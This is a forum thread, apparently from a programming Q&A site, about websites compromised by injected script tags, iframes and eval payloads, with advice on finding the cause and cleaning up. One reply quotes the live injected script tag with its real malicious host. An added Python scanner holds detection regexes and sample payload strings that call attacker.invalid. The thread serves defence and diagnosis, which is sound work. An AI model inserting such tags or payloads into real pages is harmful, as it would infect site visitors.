Reputation: 5014
My major weakness is securing my sites -- I know, a bad weakness.
I have a site now that when I view the source in Firebug, I'm seeing all kinds of scripts with the src of http://mylocksmithusa.com/sitebuilder/acura2002.php -- but they're not in my files that I can find. How did they get there, how can I find them, how can I remove them, and how do I stop them from happening again?
Similarly, another site of mine keeps having its index.php file rewritten, mostly just having some of the code erased and then a bunch of <iframe>jareqjj93u8q2u35w</iframe> gibberish added to the bottom.
My FTP passwords are very secure -- should I change them and hope it stops? Or is there more to it that I just don't understand about locking down my sites from this kind of dangerous abuse?
Thanks!
Upvotes: 0
Views: 581
Reputation: 119806
Looks like you've been a victim of a SQL injection attack or trusting unsanitised input from your query strings.
If files are being physically appended to there's also the chance that you've got some code on your site that allows file uploads without checking a user is authenticated and/or doesn't check the type of file being uploaded. This would allow a miscreant to upload a script to modify every file on your site and add these links.
Upvotes: 2
Reputation: 16
My site was attacked the same way too: <script src=http://mylocksmithusa.com/sitebuilder/acura2002.php></script>. After I checked it, apparently almost all of my .js files were appended with document.write([the script above]) on the last line. Additionally, almost all .html files were appended with an iframe just after the <body> tag (and then a few of the last lines in the files were removed), and several of the .php files on my site got appended with eval([super long codes]) at the beginning of the file.
After cleaning up the files, yesterday I changed my FTP password, and today the site isn't hacked anymore (before, every few hours the files would be changed). So I suspect some worm or something already got access to your FTP. What you can do is change the FTP password and take your site offline for a while, until you have cleaned up the files.
Upvotes: 0
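As an added example (not code from this thread), a small Python scanner for the three tampering patterns this answer describes: a trailing document.write of an external script in .js files, an iframe directly after <body> in .html files, and eval(...) at the top of .php files. The regexes and the sample file contents are constructed for this example and are assumptions, not signatures from any real tool.

```python
import re
from pathlib import Path

# Hypothetical signatures for the three tampering patterns described in the
# answer; written for this example, not taken from any real scanner.
SIGNATURES = {
    ".js": ("document.write of an external <script> on the last line",
            re.compile(r'document\.write\(\s*["\'].*<script[^>]*\bsrc\s*=', re.I)),
    ".html": ("<iframe> immediately after the <body> tag",
              re.compile(r'<body[^>]*>\s*<iframe\b', re.I)),
    ".php": ("eval(...) at the top of the file",
             re.compile(r'\A\s*<\?php\s*@?eval\s*\(', re.I)),
}

def findings_for(suffix: str, text: str) -> list:
    """Return human-readable findings for one file's contents (empty if clean)."""
    rule = SIGNATURES.get(suffix.lower())
    if rule is None:
        return []
    label, pattern = rule
    if suffix.lower() == ".js":
        # The payload was reported on the *last* line, so only inspect that
        # line; a legitimate document.write elsewhere does not trigger.
        lines = text.strip().splitlines()
        target = lines[-1] if lines else ""
    else:
        target = text
    return [label] if pattern.search(target) else []

def scan_tree(root: str) -> dict:
    """Walk a web root and map each suspicious file path to its findings."""
    report = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in SIGNATURES:
            found = findings_for(path.suffix, path.read_text(errors="replace"))
            if found:
                report[str(path)] = found
    return report

# Constructed samples mirroring the descriptions above (not real site files).
SAMPLE_JS = 'function f(){}\ndocument.write("<script src=http://attacker.invalid/x.php></script>");\n'
SAMPLE_HTML = '<html><body>\n<iframe src="http://attacker.invalid/"></iframe>\n<p>hi</p></body></html>'
SAMPLE_PHP = '<?php eval(base64_decode("QUFBQQ==")); ?>\n<?php echo "site"; ?>'
CLEAN_JS = 'document.write("<p>hello</p>");\nconsole.log(1);\n'

if __name__ == "__main__":
    import sys
    for path, found in sorted(scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items()):
        print(path, "->", "; ".join(found))
```

Run it against a copy of the web root after restoring from a known-good backup as well, so any file the restore did not overwrite still gets checked.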
Reputation: 437
You are asking us how someone popped your site and the only honest answer is "we don't know".
Check FTP and other services, and check your code for where you get input (cookie, query string, POST params, etc.), but the most likely explanation is that you installed an old, known-vulnerable version of WordPress or some other web app and a roving worm found it and exploited it.
Upvotes: 1
Reputation: 536379
A common source of the iframe-addition attacks is infected client computers leaking their FTP passwords. So you need to check both the server and any clients you have used to connect to it for malware, before changing the passwords. (And preferably changing to SFTP; nobody should still be using FTP in 2009.)
Don't just assume your machines aren't infected because you're running anti-virus software. Today's AVs are pathetically, hopelessly behind the malware writers. Take multiple opinions and if an AV finds anything don't trust it to fix the problem, because chances are it will fail, potentially leaving infections present. Instead reinstall the OS.
In the first case with the HTML seemingly added at serve-time, the server itself may be infected and need reinstalling. Either way, get them off the web until you're sure they're cleaned.
Upvotes: 1